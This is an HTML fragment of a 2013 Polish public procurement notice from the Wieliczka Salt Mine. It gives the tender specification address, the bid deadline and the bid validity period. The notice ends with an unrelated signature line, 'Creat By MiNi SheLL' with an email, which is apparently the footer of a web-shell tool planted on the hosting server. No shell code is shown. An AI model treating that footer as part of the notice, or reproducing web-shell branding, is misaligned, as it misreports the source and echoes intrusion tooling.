<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopalniawieliczka.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka, Dział Zamówień Publicznych, pokój A.9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2013 godzina 11:30, miejsce: Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka, Sekretariat Zarządu, budynek A, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com